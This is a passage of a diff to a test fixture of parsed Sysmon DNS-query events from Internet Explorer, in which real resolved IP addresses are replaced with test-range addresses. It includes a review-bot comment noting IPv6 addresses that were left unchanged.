Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4392,7 +4328,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313791534Z", + "ingested": "2021-12-09T13:49:44.739284300Z", "code": "16", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e16\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e16\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:37.933324000Z'/\u003e\u003cEventRecordID\u003e1\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4616' ThreadID='4724'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-3541430928-2051711210-1391384369-1001'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.933\u003c/Data\u003e\u003cData Name='Configuration'\u003eC:\\Users\\vagrant\\Downloads\\\"C:\\Users\\vagrant\\Downloads\\Sysmon.exe\" -i -n\u003c/Data\u003e\u003cData Name='ConfigurationFileHash'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -4456,12 +4392,12 @@ "type": "CNAME" }, { - "data": "50.116.194.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "network": { 
@@ -4477,13 +4413,13 @@ "ad.turn.com" ], "ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313792745Z", + "ingested": "2021-12-09T13:49:44.739290300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -4547,47 +4483,47 @@ "type": "CNAME" }, { - "data": "34.225.20.218", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.14.125", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.28.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.103.132", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.4.86.222", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.21.200.160", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.249.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.175.146", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -4603,20 +4539,13 @@ "ups.analytics.yahoo.com" ], "ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313794060Z", + "ingested": "2021-12-09T13:49:44.739296200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.611Z", 
@@ -4680,39 +4609,39 @@ "type": "CNAME" }, { - "data": "34.237.248.89", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.21.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.238.112", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.93.38", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.227.35.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.169.96.208", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.206.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.81.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4720,22 +4649,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
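Review bot: The IPv6 answers in this hunk (`"2001:503:a83e::2:30"` in `resolved_ip`, and likewise `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`, `2001:502:1ca1::30` in the `@@ -4751`, `@@ -4871`, `@@ -4902`, `@@ -5119`, `@@ -5145`, `@@ -5266` and `@@ -5291` hunks) are left as real public gTLD-server addresses while every IPv4 answer is rewritten to `89.160.20.156` or a `192.168.0.0/16` address, so the fixture still carries real-world public IPs and only half-meets the goal of moving test IPs to a supported subset; the RFC 3849 documentation prefix `2001:db8::/32` would be a consistent replacement. Separately, rewriting all eight A records of one event to the identical address collapses the de-duplicated `ip` list to a single entry (see `"ip": [ "89.160.20.156" ]` in the neighbouring `@@ -4603` hunk), which silently drops coverage of the multi-answer path; two or three distinct supported addresses per event would keep it. Since this expected file is regenerated from the test input log, both fixes belong in the corresponding input fixture rather than here.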
@@ -4751,23 +4680,16 @@ "pm.w55c.net" ], "ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313795525Z", + "ingested": "2021-12-09T13:49:44.739302Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4827,11 +4749,11 @@ }, "answers": [ { - "data": "35.186.239.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4839,7 +4761,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -4847,7 +4769,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -4855,7 +4777,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -4863,7 +4785,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -4871,23 +4793,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -4902,24 +4824,24 @@ "cm.eyereturn.com" ], "ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313797014Z", + "ingested": "2021-12-09T13:49:44.739307800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4983,12 +4905,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { 
@@ -5004,13 +4926,13 @@ "www.googletagservices.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313798426Z", + "ingested": "2021-12-09T13:49:44.739313700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5074,11 